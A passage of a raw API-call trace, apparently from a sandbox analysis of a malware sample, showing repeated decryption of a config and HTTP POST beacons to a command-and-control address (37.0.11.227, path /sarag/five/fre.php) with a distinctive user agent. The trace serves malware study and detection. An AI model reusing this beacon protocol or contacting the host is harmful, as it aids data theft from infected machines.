Size=0x24) returned 0x6a88e0 [0298.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.782] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0298.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.783] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.786] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.786] GetProcessHeap () returned 0x690000 [0298.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0298.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.789] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0298.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.790] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0298.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.794] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0298.794] GetProcessHeap () returned 0x690000 [0298.794] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0298.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.795] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0298.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.796] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0298.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.797] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0298.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.798] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0298.798] GetProcessHeap () returned 0x690000 [0298.798] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0298.798] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0298.798] GetProcessHeap () returned 0x690000 [0298.798] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0298.798] socket (af=2, type=1, protocol=6) returned 0x9cc [0298.798] connect (s=0x9cc, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0298.822] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0298.822] GetProcessHeap () returned 0x690000 [0298.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0298.822] GetProcessHeap () returned 0x690000 [0298.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0298.823] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0298.824] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0298.824] GetProcessHeap () returned 0x690000 [0298.824] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0298.824] GetProcessHeap () returned 0x690000 [0298.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0298.825] GetProcessHeap () returned 0x690000 [0298.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0298.825] GetProcessHeap () returned 0x690000 [0298.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0298.825] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0298.826] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0298.826] GetProcessHeap () returned 0x690000 [0298.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0298.826] GetProcessHeap () returned 0x690000 [0298.827] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0298.827] send (s=0x9cc, buf=0x6ad508*, len=242, flags=0) returned 242 [0298.827] send (s=0x9cc, buf=0x6aba40*, len=159, flags=0) returned 159 [0298.827] GetProcessHeap () returned 0x690000 [0298.827] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0298.827] recv (in: s=0x9cc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0298.912] GetProcessHeap () returned 0x690000 [0298.912] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0298.912] GetProcessHeap () returned 0x690000 [0298.913] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0298.914] GetProcessHeap () returned 0x690000 [0298.914] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0298.915] GetProcessHeap () returned 0x690000 [0298.916] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0298.916] closesocket (s=0x9cc) returned 0 [0298.918] GetProcessHeap () returned 0x690000 [0298.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0298.919] GetProcessHeap () returned 0x690000 [0298.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0298.919] GetProcessHeap () returned 0x690000 [0298.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0298.920] GetProcessHeap () returned 0x690000 [0298.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0298.921] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa4c) returned 0x9cc [0298.922] Sleep (dwMilliseconds=0xea60) [0298.924] GetProcessHeap () returned 0x690000 [0298.924] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0298.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.925] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.931] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0298.939] GetProcessHeap () returned 0x690000 [0298.939] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0298.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.940] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0298.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.941] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.941] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.942] GetProcessHeap () returned 0x690000 [0298.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0298.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.943] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0298.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.944] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0298.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.945] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0298.945] GetProcessHeap () returned 0x690000 [0298.945] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0298.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.945] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0298.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.946] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0298.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.947] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0298.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.951] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0298.951] GetProcessHeap () returned 0x690000 [0298.951] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0298.951] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0298.951] GetProcessHeap () returned 0x690000 [0298.952] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0298.952] GetProcessHeap () returned 0x690000 [0298.953] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0298.953] GetProcessHeap () returned 0x690000 [0298.953] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0298.953] GetProcessHeap () returned 0x690000 [0298.953] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0298.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.954] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.958] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0298.963] GetProcessHeap () returned 0x690000 [0298.963] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0298.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.964] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0298.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.965] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.965] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.966] GetProcessHeap () returned 0x690000 [0298.966] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0298.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.968] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0298.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.970] CryptDestroyKey (hKey=0x69d028) returned 1 [0298.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.972] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0298.972] GetProcessHeap () returned 0x690000 [0298.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0298.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.974] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0298.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.976] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0298.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.978] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0298.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.980] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0298.980] GetProcessHeap () returned 0x690000 [0298.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0298.980] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0298.980] GetProcessHeap () returned 0x690000 [0298.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0298.980] socket (af=2, type=1, protocol=6) returned 0x9d0 [0298.980] connect (s=0x9d0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0299.003] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0299.003] GetProcessHeap () returned 0x690000 [0299.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0299.003] GetProcessHeap () returned 0x690000 [0299.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0299.004] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0299.004] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0299.004] GetProcessHeap () returned 0x690000 [0299.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0299.004] GetProcessHeap () returned 0x690000 [0299.005] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0299.005] GetProcessHeap () returned 0x690000 [0299.005] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0299.005] GetProcessHeap () returned 0x690000 [0299.005] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0299.006] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0299.006] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0299.006] GetProcessHeap () returned 0x690000 [0299.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0299.006] GetProcessHeap () returned 0x690000 [0299.007] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0299.007] send (s=0x9d0, buf=0x6ad508*, len=242, flags=0) returned 242 [0299.007] send (s=0x9d0, buf=0x6aba40*, len=159, flags=0) returned 159 [0299.007] GetProcessHeap () returned 0x690000 [0299.007] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0299.007] recv (in: s=0x9d0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0299.129] GetProcessHeap () returned 0x690000 [0299.130] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0299.130] GetProcessHeap () returned 0x690000 [0299.130] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0299.131] GetProcessHeap () returned 0x690000 [0299.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0299.131] GetProcessHeap () returned 0x690000 [0299.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0299.132] closesocket (s=0x9d0) returned 0 [0299.133] GetProcessHeap () returned 0x690000 [0299.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0299.134] GetProcessHeap () returned 0x690000 [0299.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0299.134] GetProcessHeap () returned 0x690000 [0299.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0299.134] GetProcessHeap () returned 0x690000 [0299.135] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0299.148] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa88) returned 0x9d0 [0299.150] Sleep (dwMilliseconds=0xea60) [0299.152] GetProcessHeap () returned 0x690000 [0299.152] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0299.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.153] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.160] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0299.166] GetProcessHeap () returned 0x690000 [0299.166] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0299.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.168] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0299.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.169] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.186] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.186] GetProcessHeap () returned 0x690000 [0299.187] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0299.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.188] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0299.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.189] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0299.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.190] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0299.190] GetProcessHeap () returned 0x690000 [0299.190] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0299.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.191] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0299.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.192] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0299.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.193] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0299.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0299.194] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0299.194] GetProcessHeap () returned 0x690000 [0299.194] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0299.194] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0299.195] GetProcessHeap () returned 0x690000 [0299.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0299.195] GetProcessHeap () returned 0x690000 [0299.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0299.195] GetProcessHeap () returned 0x690000 [0299.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0299.196] GetProcessHeap () returned 0x690000 [0299.196] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0299.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.197] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0299.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.202] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0299.208] GetProcessHeap () returned 0x690000 [0299.208] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0299.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.209] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0299.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.210] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0299.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.211] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0299.211] GetProcessHeap () returned 0x690000 [0299.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0299.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.213] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0299.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0299.214] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0299.214] LoadLibraryW 